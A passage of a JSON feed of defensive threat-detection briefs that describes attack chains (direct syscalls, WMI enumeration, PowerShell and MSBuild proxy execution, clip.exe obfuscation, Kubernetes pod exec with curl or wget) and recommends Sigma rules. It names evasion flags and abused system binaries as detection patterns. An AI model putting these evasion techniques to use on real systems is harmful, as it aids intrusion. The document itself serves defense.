id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process access logging (Event ID 10) with call tracing and ingest the logs into your SIEM to activate the rules above (\u003ca href=\"https://ela.st/sysmon-event-10-setup\"\u003ehttps://ela.st/sysmon-event-10-setup\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM and tune them for your environment to detect direct syscall process access.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by these rules, focusing on the \u003ccode\u003eSourceImage\u003c/code\u003e, \u003ccode\u003eTargetImage\u003c/code\u003e, \u003ccode\u003eGrantedAccess\u003c/code\u003e, and \u003ccode\u003eCallTrace\u003c/code\u003e fields in the Sysmon event to determine the legitimacy of the process access attempt.\u003c/li\u003e\n\u003cli\u003ePrioritize investigation of alerts where the target process is \u003ccode\u003elsass.exe\u003c/code\u003e or other security-sensitive processes.\u003c/li\u003e\n\u003cli\u003eImplement robust endpoint detection and response (EDR) solutions to detect and prevent malicious activity on endpoints.\u003c/li\u003e\n\u003cli\u003eMonitor for suspicious process creation events originating from the flagged processes.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-direct-syscall-process-access/","summary":"Detects suspicious process access events where the call trace does not originate from known Windows system DLLs, indicating potential defense evasion by bypassing hooked APIs via direct syscalls.","title":"Suspicious Process Access via Direct System Call","url":"https://feed.craftedsignal.io/briefs/2024-01-direct-syscall-process-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["enumeration","wmi","discovery","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eAttackers can leverage the Windows Management Instrumentation (WMI) to execute commands for reconnaissance and enumeration within a compromised system. This involves spawning native Windows tools via the WMI Provider Service (WMIPrvSE). This activity is often used to gather system and network information in a stealthy manner, which could be part of a larger attack, such as lateral movement or privilege escalation. This behavior matters because it allows adversaries to gather information about the target environment without using easily detectable methods, potentially leading to further compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a Windows system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses WMI to execute a reconnaissance command.\u003c/li\u003e\n\u003cli\u003eWMIPrvSE.exe is invoked to execute the attacker\u0026rsquo;s specified command.\u003c/li\u003e\n\u003cli\u003eThe attacker executes commands such as \u003ccode\u003eipconfig.exe\u003c/code\u003e, \u003ccode\u003enet.exe\u003c/code\u003e, or \u003ccode\u003esysteminfo.exe\u003c/code\u003e via WMIPrvSE.exe to gather network configuration details, user information, and system information.\u003c/li\u003e\n\u003cli\u003eThe enumerated information is collected and potentially exfiltrated to a command and control server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the gathered information to identify further targets within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other systems using stolen credentials or exploited vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration, ransomware deployment, or persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution of enumeration commands via WMIPrvSE allows attackers to gather sensitive information about the system and network environment. This information can be used to facilitate lateral movement, privilege escalation, and data theft, potentially leading to significant financial loss, reputational damage, and disruption of business operations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture the execution of enumeration commands (Data Source: Sysmon).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Enumeration Command Spawned via WMIPrvSE\u0026rdquo; to your SIEM to detect suspicious WMIPrvSE activity (Sigma rule).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of WMIPrvSE spawning common enumeration tools such as \u003ccode\u003enet.exe\u003c/code\u003e, \u003ccode\u003eipconfig.exe\u003c/code\u003e, or \u003ccode\u003esysteminfo.exe\u003c/code\u003e (Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the scope of potential lateral movement following successful enumeration (Attack Chain).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-wmiprvse-enumeration/","summary":"This rule detects suspicious execution of system enumeration commands by the Windows Management Instrumentation Provider Service (WMIPrvSE), indicating potential reconnaissance or malicious activity on Windows systems.","title":"Suspicious Enumeration Commands Spawned via WMIPrvSE","url":"https://feed.craftedsignal.io/briefs/2024-01-wmiprvse-enumeration/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["execution","script-execution","malware"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may attempt to execute malicious scripts from suspicious directories or folders accessible by environment variables. This technique leverages script interpreters such as \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, and \u003ccode\u003epowershell.exe\u003c/code\u003e to run scripts from locations like the Temp directory, the Public user folder, or other user profile directories. The use of these locations can help attackers evade detection, as security tools may not thoroughly inspect files executed from these typically benign locations. This activity has been associated with threat actors such as Shuckworm, known to target Ukraine military.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access, potentially through phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eA malicious script is dropped into a suspicious folder such as \u003ccode\u003eC:\\Users\\Public\\\u003c/code\u003e, \u003ccode\u003e%TEMP%\u003c/code\u003e, or \u003ccode\u003eC:\\Users\\\u0026lt;username\u0026gt;\\AppData\\Local\\Temp\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, or \u003ccode\u003emshta.exe\u003c/code\u003e to execute the dropped script. The command line may contain flags to bypass execution policies (e.g., \u003ccode\u003e-ExecutionPolicy bypass\u003c/code\u003e) or hide the window (e.g., \u003ccode\u003e-w hidden\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eAlternatively, PowerShell may be invoked with the \u003ccode\u003e-ep bypass\u003c/code\u003e or \u003ccode\u003e-ExecutionPolicy Bypass\u003c/code\u003e flags, along with a command to execute the script located in the temporary folder.\u003c/li\u003e\n\u003cli\u003eThe script executes, performing malicious actions such as downloading additional payloads, establishing persistence, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe script may leverage built-in Windows utilities for further malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data theft or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to a range of damaging outcomes, including system compromise, data theft, and further propagation of malware within the network. Organizations may experience data breaches, financial losses, and reputational damage. The compromise of systems can also disrupt business operations and require extensive recovery efforts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eScript Interpreter Execution From Suspicious Folder\u003c/code\u003e to your SIEM to detect suspicious script executions.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events with a focus on script interpreters (\u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e) executing from suspicious directories, using the \u003ccode\u003elogsource\u003c/code\u003e and \u003ccode\u003edetection\u003c/code\u003e sections of the Sigma rule as a guide.\u003c/li\u003e\n\u003cli\u003eTune the filters in the Sigma rule based on your environment to reduce false positives, as described in the \u003ccode\u003efalsepositives\u003c/code\u003e section.\u003c/li\u003e\n\u003cli\u003eReview and block any observed malicious command lines containing flags like \u003ccode\u003e-ep bypass\u003c/code\u003e, \u003ccode\u003e-ExecutionPolicy bypass\u003c/code\u003e, or \u003ccode\u003e-w hidden\u003c/code\u003e, as detailed in the \u003ccode\u003eselection_proc_flags\u003c/code\u003e section of the Sigma rule.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:30:00Z","date_published":"2024-01-03T14:30:00Z","id":"/briefs/2024-01-suspicious-script-execution/","summary":"Malware may execute scripts from suspicious directories accessible via environment variables using script interpreters like cscript, wscript, mshta, and powershell to evade detection.","title":"Suspicious Script Interpreter Execution from Environment Variable Folders","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["initial-access","execution","windows","powershell","script"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies PowerShell execution initiated by Windows Script Host processes (cscript.exe or wscript.exe). Attackers often use Windows Script Host (WSH) to execute malicious scripts as an initial access method. These scripts can act as droppers for second-stage payloads or download tools and utilities necessary for further compromise. The rule focuses on the parent-child process relationship between WSH and PowerShell, highlighting a common technique used to bypass security controls and execute arbitrary commands on a compromised system. This activity is relevant to defenders as it represents a potential entry point for various attacks, including malware deployment and data exfiltration. The detection logic is based on process execution events observed in Windows environments and is designed to work with data from Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, and Sysmon.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe user receives a phishing email with a malicious attachment (e.g., a .vbs or .js file).\u003c/li\u003e\n\u003cli\u003eThe user opens the attachment, which is processed by either wscript.exe or cscript.exe.\u003c/li\u003e\n\u003cli\u003eThe scripting engine executes the embedded malicious code.\u003c/li\u003e\n\u003cli\u003eThe script downloads a PowerShell script from a remote server or contains an embedded, obfuscated PowerShell command.\u003c/li\u003e\n\u003cli\u003eThe script uses wscript.exe or cscript.exe to launch powershell.exe to execute the downloaded or embedded PowerShell script.\u003c/li\u003e\n\u003cli\u003ePowerShell executes, performing malicious actions such as downloading additional payloads, modifying system settings, or establishing persistence.\u003c/li\u003e\n\u003cli\u003ePowerShell attempts to connect to external command-and-control servers to receive further instructions.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access to the system and can proceed with lateral movement, data exfiltration, or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to initial access, allowing attackers to deploy malware, steal sensitive information, or perform other malicious activities. The impact can range from data breaches and financial losses to reputational damage. The severity depends on the attacker\u0026rsquo;s objectives and the level of access they gain. The number of affected systems depends on the scope of the phishing campaign or other initial access methods used to deliver the malicious script.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture the necessary event data for the rules below.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate process execution chains where cscript.exe or wscript.exe spawn powershell.exe using the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eImplement email security measures to block phishing emails with script attachments.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from PowerShell processes for suspicious outbound traffic.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:30:00Z","date_published":"2024-01-03T14:30:00Z","id":"/briefs/2024-01-script-powershell-execution/","summary":"Detection of PowerShell processes launched by cscript.exe or wscript.exe, indicative of potential malicious initial access or execution attempts.","title":"Suspicious PowerShell Execution via Windows Script Host","url":"https://feed.craftedsignal.io/briefs/2024-01-script-powershell-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","obfuscation"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers are increasingly using obfuscation techniques to evade detection, specifically leveraging \u003ccode\u003eclip.exe\u003c/code\u003e in conjunction with PowerShell and command-line interpreters. This combination allows for the execution of malicious code while bypassing traditional signature-based detections. This activity often includes encoding and splitting commands to avoid string-based detection. Invoke-Obfuscation is a known framework used to generate these types of payloads. Defenders should focus on detecting the specific patterns of command execution and data manipulation that are characteristic of this technique. The detection of such obfuscated PowerShell commands is crucial for identifying and mitigating potential security breaches.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to the target system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eA command interpreter (cmd.exe) is invoked to execute a complex, obfuscated command.\u003c/li\u003e\n\u003cli\u003eThe command includes \u003ccode\u003eecho\u003c/code\u003e to write data to standard output, piping the output to \u003ccode\u003eclip.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eclip.exe\u003c/code\u003e places the output (part of the malicious PowerShell code) into the clipboard.\u003c/li\u003e\n\u003cli\u003eAnother \u003ccode\u003ecmd.exe\u003c/code\u003e process invokes PowerShell to execute the content retrieved from the clipboard.\u003c/li\u003e\n\u003cli\u003ePowerShell uses reflection to load and execute .NET assemblies from the clipboard.\u003c/li\u003e\n\u003cli\u003eThe executed code performs malicious actions, such as downloading additional payloads or establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe clipboard content is cleared to remove traces of the injected code.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution of obfuscated PowerShell commands can lead to a range of malicious activities, including malware installation, data theft, and remote system control. The use of \u003ccode\u003eclip.exe\u003c/code\u003e and other obfuscation techniques significantly hinders detection efforts, potentially allowing attackers to operate undetected for extended periods. This can result in significant financial losses, data breaches, and reputational damage for affected organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Invoke-Obfuscation Via Use Clip\u0026rdquo; to your SIEM to detect command lines using \u003ccode\u003eclip.exe\u003c/code\u003e and obfuscated PowerShell (see rule details).\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for instances of \u003ccode\u003ecmd.exe\u003c/code\u003e invoking \u003ccode\u003eclip.exe\u003c/code\u003e with command lines containing \u003ccode\u003eecho\u003c/code\u003e piped to \u003ccode\u003eclip.exe\u003c/code\u003e (logsource: process_creation, product: windows).\u003c/li\u003e\n\u003cli\u003eInspect PowerShell execution logs for commands that access the clipboard, especially when followed by assembly loading or remote code execution (logsource: process_creation, product: windows).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:30:00Z","date_published":"2024-01-03T14:30:00Z","id":"/briefs/2024-01-invoke-obfuscation-clip/","summary":"The use of `clip.exe` in conjunction with PowerShell and command-line obfuscation is used to evade detection.","title":"Invoke-Obfuscation via Clip.exe","url":"https://feed.craftedsignal.io/briefs/2024-01-invoke-obfuscation-clip/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["kubernetes"],"_cs_severities":["high"],"_cs_tags":["kubernetes","execution","command and control","threat detection"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious activity within Kubernetes environments where attackers leverage \u003ccode\u003ekubectl exec\u003c/code\u003e or similar API calls to execute commands within pods. Specifically, it focuses on instances where these commands involve using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to retrieve content over HTTPS. Attackers may use this technique to download malicious scripts, tools, or exfiltrate sensitive data from compromised pods. This activity is flagged based on decoded request URIs from Kubernetes audit logs, reconstructed command strings, and filtering of benign traffic related to cluster health checks and OIDC/JWKS endpoints. The rule aims to detect anomalous behavior that deviates from typical pod execution patterns, helping defenders identify potential intrusions or misuse of pod execution privileges. The rule was created on 2026/04/23 and last updated on 2026/04/23 according to the source.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to the Kubernetes cluster, possibly through compromised credentials or a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target pod within the cluster to execute commands within.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e or a similar API call to initiate a shell session within the target pod.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a command using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to download a malicious script, tool, or exfiltrate data over HTTPS. The URL is often encoded in the requestURI.\u003c/li\u003e\n\u003cli\u003eThe Kubernetes API server records the exec call and its parameters in the audit logs.\u003c/li\u003e\n\u003cli\u003eThe detection rule decodes the requestURI, extracts the command string, and identifies the use of \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e with an HTTPS URL.\u003c/li\u003e\n\u003cli\u003eThe rule filters out known benign URLs associated with cluster health checks or OIDC/JWKS endpoints.\u003c/li\u003e\n\u003cli\u003eIf the command is identified as malicious, an alert is triggered, indicating a potential compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the deployment of malicious tools within the Kubernetes environment, potentially enabling lateral movement, data theft, or denial-of-service attacks.  Compromised pods could expose sensitive data or be used as a launchpad for further attacks on the cluster or other systems. The scope of impact depends on the permissions granted to the compromised pod and the attacker\u0026rsquo;s objectives.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Kubernetes Pod Exec with Curl or Wget to HTTPS\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eReview Kubernetes RoleBindings for \u003ccode\u003epods/exec\u003c/code\u003e to ensure only required principals retain access on sensitive namespaces.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by reviewing the decoded URI and reconstructed command in the alert details.\u003c/li\u003e\n\u003cli\u003eImplement network policies to restrict egress traffic from pods, limiting the potential for data exfiltration via HTTPS.\u003c/li\u003e\n\u003cli\u003eRegularly audit Kubernetes audit logs for suspicious activity related to pod execution and API calls.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:27:00Z","date_published":"2024-01-03T14:27:00Z","id":"/briefs/2024-01-kubernetes-pod-exec/","summary":"This rule detects Kubernetes pod exec API calls using curl or wget to fetch HTTPS URLs, potentially indicating malicious activity such as staging tools or exfiltrating data.","title":"Kubernetes Pod Exec with Curl or Wget to HTTPS","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-pod-exec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["powershell","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Lenovo","PDQ.com Corporation","Dell Technologies Inc.","Chocolatey Software, Inc","Docker Inc"],"content_html":"\u003cp\u003eAttackers can leverage the PowerShell engine without directly executing \u003ccode\u003epowershell.exe\u003c/code\u003e. This technique, often referred to as \u0026ldquo;PowerShell without PowerShell,\u0026rdquo; involves using the underlying System.Management.Automation namespace. This approach allows attackers to bypass application allowlisting and PowerShell security features, operating more stealthily within a compromised environment. This technique makes detection more challenging, as standard PowerShell execution logs might not capture the activity. The activity is detected by monitoring which processes load the System.Management.Automation.dll or System.Management.Automation.ni.dll libraries. This activity can legitimately happen where vendors have their own PowerShell implementations that are shipped with some products.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through various means, such as exploiting a vulnerability or using compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker deploys a custom tool or script on the target system. This tool is designed to interact with the System.Management.Automation namespace directly.\u003c/li\u003e\n\u003cli\u003eThe custom tool loads the \u003ccode\u003eSystem.Management.Automation.dll\u003c/code\u003e or \u003ccode\u003eSystem.Management.Automation.ni.dll\u003c/code\u003e library into its process space.\u003c/li\u003e\n\u003cli\u003eThe tool uses the loaded PowerShell engine to execute malicious commands or scripts without invoking \u003ccode\u003epowershell.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance activities, such as gathering system information or network configurations, using PowerShell commands.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to move laterally within the network, leveraging the PowerShell engine to execute commands on other systems.\u003c/li\u003e\n\u003cli\u003eThe attacker installs malware or backdoors using the PowerShell engine to maintain persistence within the compromised environment.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data or causes damage to the system, completing the objectives of the attack.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack leveraging \u0026ldquo;PowerShell without PowerShell\u0026rdquo; can lead to significant compromise of Windows systems. Attackers can bypass traditional security measures, potentially leading to data theft, system disruption, or the installation of persistent malware. The technique\u0026rsquo;s stealthy nature can prolong the time to detection, increasing the potential for widespread damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious PowerShell Engine ImageLoad\u003c/code\u003e to your SIEM to detect when the \u003ccode\u003eSystem.Management.Automation.dll\u003c/code\u003e or \u003ccode\u003eSystem.Management.Automation.ni.dll\u003c/code\u003e libraries are loaded by unexpected processes.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the process execution chain (parent process tree) for unknown processes.\u003c/li\u003e\n\u003cli\u003eImplement endpoint detection and response (EDR) solutions like Elastic Defend to provide visibility into process behavior and library loading events, activating the \u003ccode\u003eprocess_creation\u003c/code\u003e and \u003ccode\u003eimage_load\u003c/code\u003e log sources.\u003c/li\u003e\n\u003cli\u003eReview and tune exclusions to the Sigma rule based on legitimate vendor applications to reduce false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-suspicious-powershell-imageload/","summary":"This rule identifies instances where the PowerShell engine is loaded by processes other than powershell.exe, potentially indicating attackers attempting to use PowerShell functionality stealthily by using the underlying System.Management.Automation namespace and bypassing PowerShell security features.","title":"Suspicious PowerShell Engine ImageLoad","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-powershell-imageload/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["MSBuild"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","msbuild","proxy-execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe Microsoft Build Engine (MSBuild) is a software build platform typically used by developers. However, attackers can abuse MSBuild to execute malicious code by using it as a proxy execution method, allowing them to bypass traditional defenses. This technique involves invoking MSBuild from scripting environments like PowerShell or cmd.exe to run arbitrary code within the context of a trusted process. The activity detected by this rule focuses on instances where MSBuild is launched by a script interpreter, which is not typical for standard software development workflows. This behavior, observed since at least 2020, can be used for stealthy execution of payloads and defense evasion tactics, especially in environments that trust MSBuild as a legitimate system utility. Defenders should be aware of this technique as it allows attackers to blend in with normal system activity and bypass application control policies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the target system, potentially through phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eA script (e.g., PowerShell, cmd.exe) is used to execute a malicious command or series of commands.\u003c/li\u003e\n\u003cli\u003eThe script invokes \u003ccode\u003emsbuild.exe\u003c/code\u003e with specific arguments to execute arbitrary code. This might involve inline tasks or references to external XML project files containing malicious instructions.\u003c/li\u003e\n\u003cli\u003eMSBuild processes the provided XML file or inline task, interpreting and executing the malicious code.\u003c/li\u003e\n\u003cli\u003eThe executed code performs actions such as downloading additional payloads, modifying system configurations, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eMSBuild, acting as a proxy, executes the attacker\u0026rsquo;s code within a trusted process, potentially evading detection by security software.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised system to move laterally within the network, escalating privileges, and accessing sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s final objective is achieved, such as data exfiltration or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code on Windows systems, potentially leading to data theft, system compromise, and further propagation within the network. This technique can bypass application control and other security measures, making it difficult to detect and prevent. The impact can range from minor data breaches to complete system takeover, depending on the attacker\u0026rsquo;s objectives and the compromised system\u0026rsquo;s role within the organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture the process tree and command-line arguments, enabling detection of suspicious MSBuild executions.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eMicrosoft Build Engine Started by a Script Process\u003c/code\u003e to your SIEM to identify instances of MSBuild being invoked by script interpreters. Tune the rule with appropriate whitelisting for known development activities to reduce false positives.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for \u003ccode\u003emsbuild.exe\u003c/code\u003e with parent processes such as \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, and \u003ccode\u003emshta.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of MSBuild to authorized users and directories.\u003c/li\u003e\n\u003cli\u003eRegularly review and update the list of excluded processes and directories in the Sigma rule to adapt to changing development practices.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-msbuild-script-execution/","summary":"Adversaries may use MSBuild, a legitimate Microsoft tool, to execute malicious code through script interpreters for defense evasion and execution on Windows systems.","title":"Suspicious MSBuild Execution from Scripting Processes","url":"https://feed.craftedsignal.io/briefs/2024-01-msbuild-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","mounted-device","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious execution of script interpreters or signed binaries from mounted devices in Windows environments. Attackers attempt to evade defenses by launching processes from non-standard directories, such as mounted devices. This technique can be employed following initial access via phishing or other means. The focus is on processes spawned by \u003ccode\u003eexplorer.exe\u003c/code\u003e with a working directory on removable drives (D, E, F) and named \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003epwsh.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003eregsvr32.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003ecertutil.exe\u003c/code\u003e, \u003ccode\u003ebitsadmin.exe\u003c/code\u003e, \u003ccode\u003emsiexec.exe\u003c/code\u003e, \u003ccode\u003ewmic.exe\u003c/code\u003e, \u003ccode\u003eschtasks.exe\u003c/code\u003e, or \u003ccode\u003emsbuild.exe\u003c/code\u003e. This behavior is anomalous and indicative of potential malicious activity. The rule originates from Elastic\u0026rsquo;s detection rule set.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser unknowingly executes a malicious file (T1204.002) or opens a phishing email leading to drive-by compromise.\u003c/li\u003e\n\u003cli\u003eThe malicious file is downloaded onto the system, potentially onto a mounted device such as a USB drive (D:, E:, or F:).\u003c/li\u003e\n\u003cli\u003eThe user interacts with the mounted device via \u003ccode\u003eexplorer.exe\u003c/code\u003e, inadvertently triggering the execution of a malicious script or binary (TA0002).\u003c/li\u003e\n\u003cli\u003eThe script interpreter (e.g., powershell.exe, cmd.exe) or a signed binary (e.g., mshta.exe, regsvr32.exe) is executed from the mounted device (T1059).\u003c/li\u003e\n\u003cli\u003eThe process inherits the working directory from the mounted device, further masking its origin.\u003c/li\u003e\n\u003cli\u003eThe script or binary performs malicious actions, such as downloading additional malware, 